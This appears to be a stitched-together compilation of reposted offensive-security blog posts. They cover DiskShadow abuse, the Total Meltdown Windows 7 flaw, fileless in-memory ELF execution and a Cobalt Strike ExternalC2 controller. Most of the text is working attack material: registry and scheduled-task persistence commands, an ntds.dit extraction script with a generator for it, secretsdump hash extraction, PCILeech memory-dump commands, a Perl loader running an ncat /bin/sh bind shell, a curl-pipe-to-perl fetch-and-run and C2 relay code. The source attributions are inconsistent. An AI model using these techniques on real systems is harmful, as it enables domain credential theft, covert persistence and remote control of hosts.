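On the receiving side, an endpoint only needs to pull a couple of fields out of the JSON body of each report. A hypothetical parsing sketch, with field names taken from the sample report shown earlier in the post (the helper name is illustrative):

```python
import json
from urllib.parse import urlparse, parse_qs

def summarise_xss_report(raw: bytes) -> dict:
    """Extract the interesting bits from an XSS Auditor report body."""
    report = json.loads(raw)["xss-report"]
    url = report.get("request-url", "")
    # The reflected payload usually sits in a query parameter of request-url.
    params = parse_qs(urlparse(url).query)
    return {"url": url, "params": params, "body": report.get("request-body", "")}

sample = b'''{"xss-report": {
  "request-url": "https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/?search=%3Cscript%3Ealert(123);%3C/script%3E",
  "request-body": ""}}'''
print(summarise_xss_report(sample)["params"])
```

Decoding the query string like this makes the suspected payload immediately readable in logs instead of leaving it percent-encoded.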
-
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction
MARCH 26, 2018 ~ BOHOPS

[Source: blog.microsoft.com]

Introduction

Not long ago, I blogged about Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction. This tool was quite interesting because it was yet another utility to perform volume shadow copy operations, and it had a few other features that could potentially support other offensive use cases. In fairness, evasion and persistence are probably not the strong suits of Vshadow.exe, but some of those use cases may have more relevance in its replacement - DiskShadow.exe. In this post, we will discuss DiskShadow, present relevant features and capabilities for offensive opportunities, and highlight IOCs for defensive considerations.

*Don't mind the ridiculous title - it just seemed thematic

What is DiskShadow?

"DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode." - Microsoft Docs

DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows-signed binary. The VSS features of DiskShadow require privileged-level access (with UAC elevation); however, several command utilities can be invoked by a non-privileged user. This makes DiskShadow a very interesting candidate for command execution and evasive persistence.

DiskShadow Command Execution

As a feature, the interactive command interpreter and script mode support the EXEC command. As a privileged or an unprivileged user, commands and batch scripts can be invoked within Interactive Mode or via a script file.
Let's demonstrate each of these capabilities:

Note: The following example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail.

Interactive Mode

In the following example, a normal user invokes calc.exe:

Script Mode

In the following example, a normal user invokes calc.exe and notepad.exe by calling the script option with diskshadow.txt:

diskshadow.exe /s c:\test\diskshadow.txt

Like Vshadow, take note that DiskShadow.exe is the parent process of the spawned executable. Additionally, DiskShadow will continue to run until its child processes are finished executing.

Auto-Start Persistence & Evasion

Since DiskShadow is a Windows-signed binary, let's take a look at a few AutoRuns implications for persistence and evasion. In the following examples, we will update our script, then create a Run key and a Scheduled Task.

Preparation

Since DiskShadow is "window forward" (e.g. pops a command window), we will need to modify our script in a way that invokes proof-of-concept pass-thru execution and closes the parent DiskShadow and subsequent payloads as quickly as possible. In some cases, this technique may not be considered very stealthy if the window is open for a lengthy period of time (which is good for defenders if this activity is noted and reported by users). However, this may be overlooked if users are conditioned to see such prompts at logon time.

Note: The following example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail.
First, let's modify our script (diskshadow.txt) to demonstrate this basic technique:

EXEC "cmd.exe" /c c:\test\evil.exe

*In order to support command switches, we must quote the initial binary with EXEC. This also works under Interactive Mode.

Second, let's add persistence with the following commands:

- Run Key Value -
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt"

- User Level Scheduled Task -
schtasks /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt"

Let's take a further look at these...

AutoRuns - Run Key Value

After creating the key value, we can see that our key is hidden when we open up AutoRuns and select the Logon tab. By default, Windows-signed executables are hidden from view (with a few notable exceptions), as demonstrated in this screenshot:

After de-selecting "Hide Windows Entries", we can see the AutoRuns entry:

AutoRuns - Scheduled Tasks

Like the Run key method, we can see that our entry is hidden in the default AutoRuns view:

After de-selecting "Hide Windows Entries", we can see the AutoRuns entry:

Extracting the Active Directory Database

Since we are discussing the usage of a shadow copy tool, let's move forward to showcase (yet another) VSS method for extracting the Active Directory (AD) database - ntds.dit. In the following walk-through, we will assume successful compromise of an Active Directory Domain Controller (Win2k12) and that we are running DiskShadow under a privileged context in Script Mode. First, let's prepare our script. We have performed some initial recon to determine our target drive letter (for the logical drive that 'contains' the AD database) to shadow, as well as discovered a logical drive letter that is not in use on the system.
Here is the DiskShadow script (diskshadow.txt):

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset

[Helpful Source: DataCore]

In this script, we create a persistent shadow copy so that we can perform copy operations to capture the sensitive target file. By mounting a (unique) logical drive, we can guarantee a copy path for our target file, which we extract to the 'exfil' directory before deleting our shadow copy identified by someAlias.

*Note: We can attempt to copy out the target file by specifying a shadow device name/unique identifier. This is slightly stealthier, but it is important to ensure that labels/UUIDs are correct (via initial recon) or else the script will fail to run. This use case may be more suitable for Interactive Mode.

The commands and results of the DiskShadow operation are presented in this screenshot:

type c:\diskshadow.txt
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil

In addition to the AD database, we will also need to extract the SYSTEM registry hive:

reg.exe save hklm\system c:\exfil\system.bak

After transferring these files from the target machine, we use SecretsDump.py to extract the NTLM hashes:

secretsdump.py -ntds ntds.dit -system system.bak LOCAL

Success! We have used another method to extract the AD database and hashes. Now, let's compare and contrast DiskShadow and Vshadow...

DiskShadow vs. Vshadow

DiskShadow.exe and VShadow.exe have very similar capabilities. However, there are a few differences between these applications that may justify which one is the better choice for the intended operational use case. Let's explore some of these in greater detail:

Operating System Inclusion

DiskShadow.exe has been included with the Windows Server operating system since 2008. Vshadow.exe is included with the Windows SDK.
Unless the target machine has the Windows SDK installed, Vshadow.exe must be uploaded to the target machine. In a "living off the land" scenario, DiskShadow.exe has the clear advantage.

Utility & Usage

Under the context of a normal user in our test case, we can use several DiskShadow features without privilege (UAC) implications. In my previous testing, Vshadow had privilege constraints (e.g. external command execution could only be invoked after running a VSS operation). Additionally, DiskShadow is flexible with command switch support, as previously described. DiskShadow.exe has the advantage here.

Command Line Orientation

Vshadow is "command line friendly", while DiskShadow requires use via an interactive prompt or a script file. Unless you have (remote) "TTY" access to a target machine, DiskShadow's interactive prompt may not be suitable (e.g. for some backdoor shells). Additionally, there is an increased risk of detection when creating files on or uploading files to a target machine. In the strict confines of this scenario, Vshadow has the advantage (although creating a text file will likely have less impact than uploading a binary - refer to the previous section).

AutoRuns Persistence & Evasion

In the previous Vshadow blog post, you may recall that Vshadow is signed with the Microsoft signing certificate. This has AutoRuns implications such that it will appear within the default view, since Microsoft-signed binaries are not hidden. Since DiskShadow is signed with the Windows certificate, it is hidden from the default view. In this scenario, DiskShadow has the advantage.

Active Directory Database Extraction

If script mode is the only option for DiskShadow usage, extracting the AD database may require additional operations if assumed defaults are not valid (e.g. the Shadow Volume disk name is not what we expected). Aside from crafting and running the script, a logical drive may have to be mapped on the target machine to copy out ntds.dit.
This does add an additional level of noise to the shadow copy operation. Vshadow has the advantage here.

Conclusion

All things considered, DiskShadow seems to be more compelling for operational use. However, that does not discount Vshadow (and other VSS methods, for that matter) as a prospective tool used by threat agents. Vshadow has been used maliciously in the past for other reasons. For DiskShadow, Blue Teams and network defenders should consider the following:

- Monitor the Volume Shadow Service (VSS) for random shadow creations/deletions and any activity that involves the AD database file (ntds.dit).
- Monitor for suspicious instances of System Event ID 7036 ("The Volume Shadow Copy service entered the running state") and invocation of the VSSVC.exe process.
- Monitor process creation events for diskshadow.exe and spawned child processes.
- Monitor for process integrity. If diskshadow.exe runs at a medium integrity, that is likely a red flag.
- Monitor for instances of diskshadow.exe on client endpoints. Unless there is a business need, diskshadow.exe *should* not be present on client Windows operating systems.
- Monitor for new and interesting logical drive mappings.
- Inspect suspicious "AutoRuns" entries. Scrutinize signed binaries and inspect script files.
- Enforce application whitelisting. Strict policies may prevent DiskShadow pass-thru applications from executing.
- Fight the good fight, and train your users. If they see something (e.g. a weird pop-up window), they should say something!

As always, if you have questions or comments, feel free to reach out to me here or on Twitter. Thank you for taking the time to read about DiskShadow!

Source: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
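For what it's worth, the AD extraction script shown earlier is easy to template so the shadowed volume, spare drive letter and exfil path aren't hardcoded. A hypothetical generator sketch (the defaults mirror the manual script above; the function and alias names are illustrative):

```python
def build_diskshadow_script(volume="c:", mount="z:", exfil=r"c:\exfil",
                            alias="someAlias"):
    """Render a DiskShadow script that shadows a volume, copies out
    ntds.dit via an exposed drive letter, then deletes the shadow copy."""
    return "\n".join([
        "set context persistent nowriters",
        f"add volume {volume} alias {alias}",
        "create",
        f"expose %{alias}% {mount}",
        # The exposed drive letter gives us a stable copy path for ntds.dit.
        rf'exec "cmd.exe" /c copy {mount}\windows\ntds\ntds.dit {exfil}\ntds.dit',
        f"delete shadows volume %{alias}%",
        "reset",
    ])

print(build_diskshadow_script())
```

The rendered text would then be written to diskshadow.txt and passed to diskshadow.exe /s, exactly as in the walk-through; from a defender's perspective, these script files themselves are worth hunting for.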
-
Total Meltdown?

Did you think Meltdown was bad? Unprivileged applications being able to read kernel memory at speeds possibly as high as megabytes per second was not a good thing.

Meet the Windows 7 Meltdown patch from January. It stopped Meltdown but opened up a vulnerability way worse... It allowed any process to read the complete memory contents at gigabytes per second - oh, and it was possible to write to arbitrary memory as well.

No fancy exploits were needed. Windows 7 already did the hard work of mapping the required memory into every running process. Exploitation was just a matter of reading and writing already-mapped in-process virtual memory. No fancy APIs or syscalls required - just standard read and write!

Accessing memory at over 4GB/s; dumping to disk is slower due to disk transfer speeds.

How is this possible?

In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user-mode code in every process. The page tables should normally only be accessible by the kernel itself. The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM. For more in-depth information about paging, please have a look at Getting Physical: Extreme abuse of Intel based Paging Systems - Part 1 and Part 2.

PML4 self-referencing entry at offset 0xF68 with value 0x0000000062100867.

Windows has a special entry in this topmost PML4 page table that references itself, a self-referencing entry. In Windows 7 the PML4 self-reference is fixed at position 0x1ED, offset 0xF68 (it is randomized in Windows 10). This means that the PML4 will always be mapped at the address 0xFFFFF6FB7DBED000 in virtual memory. This is normally a memory address only made available to the kernel (Supervisor).
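The fixed mapping address follows directly from the self-reference slot: the 9-bit index 0x1ED lands at bit positions 39, 30, 21 and 12 of the virtual address, and bit 47 is sign-extended to form a canonical address. A quick check of the numbers from the post:

```python
IDX = 0x1ED  # Windows 7's fixed PML4 self-reference slot

# Each PML4 entry is 8 bytes, so slot 0x1ED sits at byte offset 0xF68.
assert IDX * 8 == 0xF68

# Following the self-referencing entry at every paging level puts the same
# 9-bit index into each index field (bits 47-39, 38-30, 29-21, 20-12).
va = (IDX << 39) | (IDX << 30) | (IDX << 21) | (IDX << 12)

# Canonical form: sign-extend bit 47 into bits 63-48.
if va & (1 << 47):
    va |= 0xFFFF << 48

print(hex(va))  # 0xfffff6fb7dbed000

# The PML4e value's low bits are permission flags: 0x...867 ends in 7,
# i.e. bits 0 (Present), 1 (Writable) and 2 (User) are all set.
entry = 0x0000000062100867
assert entry & 0b111 == 0b111
```

The computed address matches the 0xFFFFF6FB7DBED000 mapping quoted above, and the trailing 7 of the entry value is exactly the Present/Writable/User combination discussed next.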
Since the permission bit was erroneously set to User, the PML4 was mapped into every process and made available to code executing in user mode.

"Kernel address" memory addresses mapped in every process as user-mode read/write pages.

Once read/write access has been gained to the page tables, it is trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for virtualization. All one has to do is write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory. The last '7' in the PML4e 0x0000000062100867 (from the above example) indicates that bits 0, 1 and 2 are set, which means it's Present, Writable and User-mode accessible, as per the description in the Intel Manual.

Excerpt from the Intel Manual: if bit 2 is set to '1', user-mode access is permitted.

Can I try this out myself?

Yes, absolutely. The technique has been added as a memory acquisition device to the PCILeech direct memory access attack toolkit. Just download PCILeech and execute it with device type -device totalmeltdown on a vulnerable Windows 7 system. Dump memory to file with the command: pcileech.exe dump -out memorydump.raw -device totalmeltdown -v -force

If you have the Dokany file system driver installed, you should be able to mount the running processes as files and folders in the Memory Process File System - with the virtual memory of the kernel and the processes as read/write. To mount the processes, issue the command: pcileech.exe mount -device totalmeltdown

Please remember to re-install your security updates if you temporarily uninstall the latest one in order to test this vulnerability.

A vulnerable system is "exploited" and the running processes are mounted with PCILeech. Process memory maps and PML4 are accessed.

Is my system vulnerable?

Only Windows 7 x64 systems patched with the 2018-01 or 2018-02 patches are vulnerable.
If your system hasn't been patched since December 2017, or if it's patched with the 2018-03-29 patches or later, it will be secure. Other Windows versions - such as Windows 10 or 8.1 - are completely secure with regards to this issue and have never been affected by it.

Other

I discovered this vulnerability just after it had been patched in the 2018-03 Patch Tuesday. I have not been able to correlate the vulnerability to known CVEs or other known issues.

Updates

Windows 2008R2 was vulnerable as well. An out-of-band (OOB) security update was released to fully resolve the vulnerability on 2018-03-29: CVE-2018-1038. Apply immediately if affected!

Timeline

2018-03-xx--25: Issue identified in Windows 7 x64. Issue seemed to be patched already. PoC coded. Contacted MSRC with technical description asking if OK to publish a blog entry or if I should hold off publication.
2018-03-26: Green light given by MSRC for me to publish blog entry.
2018-03-27: Published blog entry and PoC.
2018-03-28: Found out that the March patches only partially resolved the vulnerability. Contacted MSRC again.
2018-03-29: OOB security update released by Microsoft. CVE-2018-1038. Apply immediately if affected!

Huge thank you to everyone at Microsoft who worked hard to resolve this issue. It is super impressive to be able to roll out a complex kernel update in little over a day. It was never my intention to release a fairly potent kernel 0-day publicly. I hope the above timeline explains how this could happen.

Source: https://blog.frizk.net/2018/03/total-meltdown.html?m=1
-
In-Memory-Only ELF Execution (Without tmpfs)
10 minute read

CONTENTS
- INTRODUCTION
- CAVEATS
- ON TARGET
- MEMFD_CREATE(2)
- WRITE(2)
- OPTIONAL: FORK(2)
- EXECVE(2)
- SCRIPTING IT
- ARTIFACTS
- DEMO

TL;DR: In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).

Introduction

Every so often, it's handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn't it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process?

Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary.

The manpage has the following to say on the subject of naming anonymous files:

    The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn't really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name.
Listing /proc/<PID>/fd, anonymous files look like this:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd
total 0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted)
lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted)

Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird, but c'est la vie.

Caveats

Unless we land on target with some way to call memfd_create(2) from our initial vector (e.g. injection into a Perl or Python program with eval()), we'll need a way to execute system calls on target. We could drop a binary to do this, but then we've failed to achieve fileless ELF execution. Fortunately, Perl's syscall() solves this problem for us nicely.

We'll also need a way to write an entire binary to the target's memory as the contents of the anonymous file. For this, we'll put it in the source of the script we'll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn't seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target's kernel version with uname -r:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r
4.4.0-116-generic

On Target

Aside from execve(2)ing an anonymous file instead of a regular filesystem file, and doing it all in Perl, there isn't much difference from starting any other program. Let's have a look at the system calls we'll use.

memfd_create(2)

Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we'll use the memfd_create(2) system call to make our anonymous file.
We'll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary.

Because we're using Perl's syscall() to call memfd_create(2), we don't have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we'll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
asm-generic/unistd.h:#define __NR_memfd_create 279
asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
linux/memfd.h:#define MFD_CLOEXEC 0x0001U
x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319
x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is the constant 0x0001U (i.e. 1, in linux/memfd.h). Now that we've got the numbers we need, we're almost ready to do the Perl equivalent of C's fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)).

The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we'll pass an empty string to memfd_create(2) via syscall().
Perl's syscall() won't take string literals (due to passing a pointer under the hood), so we make a variable holding the empty string and use it instead. Putting it together, let's finally make our anonymous file:

my $name = "";
my $fd = syscall(319, $name, 1);
if (-1 == $fd) {
    die "memfd_create: $!";
}

We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`'
total 0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted)

write(2)

Now that we have an anonymous file, we need to fill it with ELF data. First we'll need to get a Perl filehandle from the file descriptor, then we'll need to get our data into a format that can be written, and finally, we'll write it.

Perl's open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We'll also want to enable autoflush on the new file handle:

open(my $FH, '>&='.$fd) or die "open: $!";
select((select($FH), $|=1)[0]);

We now have a file handle which refers to our anonymous file. Next we need to make our binary available to Perl, so we can write it to the anonymous file. We'll turn the binary into a bunch of Perl print statements, each of which writes a chunk of our binary to the anonymous file.
perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary This will give us many, many lines similar to: print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/; print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/; print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/; Executing those puts our ELF binary into memory. Time to run it. Optional: fork(2) Ok, fork(2) isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like: while ($keep_going) { my $pid = fork(); if (-1 == $pid) { # Error die "fork: $!"; } if (0 == $pid) { # Child # Do child things here exit 0; } } Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate: # Spawn child my $pid = fork(); if (-1 == $pid) { # Error die "fork1: $!"; } if (0 != $pid) { # Parent terminates exit 0; } # In the child, become session leader if (-1 == syscall(112)) { die "setsid: $!"; } # Spawn grandchild $pid = fork(); if (-1 == $pid) { # Error die "fork2: $!"; } if (0 != $pid) { # Child terminates exit 0; } # In the grandchild here, do grandchild things We can now have our ELF process run multiple times or in a separate process. Let’s do it. execve(2) Linux process creation is a funny thing. 
Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albeit with easier syntax. We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else. The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor. exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!"; The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the /proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process. We’ve now got an ELF binary running without putting anything on disk or even in the filesystem. Scripting it It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. 
Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list: cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"' This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to Perl’s stdin via our local SSH client. The end result is that our script is run without touching disk at all. Without creds but with access to the target (i.e. after exploiting our way on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there. Artifacts Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink. If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2). Other than that, there’s very little evidence anything is wrong. Demo To see this in action, have a look at this asciicast. TL;DR In C (translate to your non-disk-touching language of choice): fd = memfd_create("", MFD_CLOEXEC); write(fd, elfbuffer, elfbuffer_len); asprintf(&p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL); Updated: March 31, 2018 Sursa: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
-
Exploring Cobalt Strike's ExternalC2 framework Posted on 30th March 2018 As many testers will know, achieving C2 communication can sometimes be a pain. Whether because of egress firewall rules or process restrictions, the simple days of reverse shells and reverse HTTP C2 channels are quickly coming to an end. OK, maybe I exaggerated that a bit, but it's certainly becoming harder. So, I wanted to look at some alternate routes to achieve C2 communication and with this, I came across Cobalt Strike’s ExternalC2 framework. ExternalC2 ExternalC2 is a specification/framework introduced by Cobalt Strike, which allows hackers to extend the default HTTP(S)/DNS/SMB C2 communication channels offered. The full specification can be downloaded here. Essentially this works by allowing the user to develop a number of components: Third-Party Controller - Responsible for creating a connection to the Cobalt Strike TeamServer, and communicating with a Third-Party Client on the target host using a custom C2 channel. Third-Party Client - Responsible for communicating with the Third-Party Controller using a custom C2 channel, and relaying commands to the SMB Beacon. SMB Beacon - The standard beacon which will be executed on the victim host. Using the diagram from CS's documentation, we can see just how this all fits together: Here we can see that our custom C2 channel is transmitted between the Third-Party Controller and the Third-Party Client, both of which we can develop and control. Now, before we roll up our sleeves, we need to understand how to communicate with the Team Server ExternalC2 interface. First, we need to tell Cobalt Strike to start ExternalC2. This is done with an aggressor script calling the externalc2_start function, and passing a port. Once the ExternalC2 service is up and running, we need to communicate using a custom protocol. 
The protocol is actually pretty straightforward, consisting of a 4 byte little-endian length field, and a blob of data, for example: To begin communication, our Third-Party Controller opens a connection to TeamServer and sends a number of options: arch - The architecture of the beacon to be used (x86 or x64). pipename - The name of the pipe used to communicate with the beacon. block - Time in milliseconds that TeamServer will block between tasks. Once each option has been sent, the Third-Party Controller sends a go command. This starts the ExternalC2 communication, and causes a beacon to be generated and sent. The Third-Party Controller then relays this SMB beacon payload to the Third-Party Client, which then needs to spawn the SMB beacon. Once the SMB beacon has been spawned on the victim host, we need to establish a connection to enable passing of commands. This is done over a named pipe, and the protocol used between the Third-Party Client and the SMB Beacon is exactly the same as between the Third-Party Client and Third-Party Controller... a 4 byte little-endian length field, and trailing data. OK, enough theory, let’s create a “Hello World” example to simply relay the communication over a network. Hello World ExternalC2 Example For this example, we will be using Python on the server side for our Third-Party Controller, and C for our client side Third-Party Client. First, we need our aggressor script to tell Cobalt Strike to enable ExternalC2: # start the External C2 server and bind to 0.0.0.0:2222 externalc2_start("0.0.0.0", 2222); This opens up ExternalC2 on 0.0.0.0:2222. Now that ExternalC2 is up and running, we can create our Third-Party Controller. Let’s first establish our connection to the TeamServer ExternalC2 interface: _socketTS = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketTS.connect(("127.0.0.1", 2222)) Once established, we need to send over our options. 
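The 4 byte length framing is simple enough to sanity-check in isolation before wiring it into sockets. A short sketch of the encode/decode round-trip (the function names are mine, mirroring the helpers used in the controller):

```python
import struct

def encode_frame(data):
    # 4 byte little-endian length field, followed by the raw data
    return struct.pack("<I", len(data)) + data

def decode_frame(frame):
    (length,) = struct.unpack("<I", frame[:4])
    return frame[4:4 + length]

wire = encode_frame(b"go")
print(wire)                # b'\x02\x00\x00\x00go'
print(decode_frame(wire))  # b'go'
```

The same framing is used in both directions and on both legs (controller-to-TeamServer and client-to-beacon), which is why one pair of helpers is enough.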
We will create a few quick helper functions to allow us to prefix our 4 byte length without manually crafting it each time: def encodeFrame(data): return struct.pack("<I", len(data)) + data def sendToTS(data): _socketTS.sendall(encodeFrame(data)) Now we can use these helper functions to send over our options: # Send out config options sendToTS("arch=x86") sendToTS("pipename=xpntest") sendToTS("block=500") sendToTS("go") Now that Cobalt Strike knows we want an x86 SMB Beacon, we need to receive data. Again, let’s create a few helper functions to handle the decoding of packets rather than manually decoding each time: def decodeFrame(data): frameLen = struct.unpack("<I", data[0:4])[0] body = data[4:] return (frameLen, body) def recvFromTS(): data = "" _len = _socketTS.recv(4) l = struct.unpack("<I",_len)[0] while len(data) < l: data += _socketTS.recv(l - len(data)) return data This allows us to receive raw data with: data = recvFromTS() Next, we need to allow our Third-Party Client to connect to us using a C2 protocol of our choice. For now, we are simply going to use the same 4 byte length packet format for our C2 channel protocol. So first, we need a socket for the Third-Party Client to connect to: _socketBeacon = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketBeacon.bind(("0.0.0.0", 8081)) _socketBeacon.listen(1) _socketClient = _socketBeacon.accept()[0] Then, once a connection is received, we enter our recv/send loop where we receive data from the victim host, forward this onto Cobalt Strike, and receive data from Cobalt Strike, forwarding this to our victim host: while(True): print "Sending %d bytes to beacon" % len(data) sendToBeacon(data) data = recvFromBeacon() print "Received %d bytes from beacon" % len(data) print "Sending %d bytes to TS" % len(data) sendToTS(data) data = recvFromTS() print "Received %d bytes from TS" % len(data) Our finished example can be found here. Now we have a working controller, we need to create our Third-Party Client. 
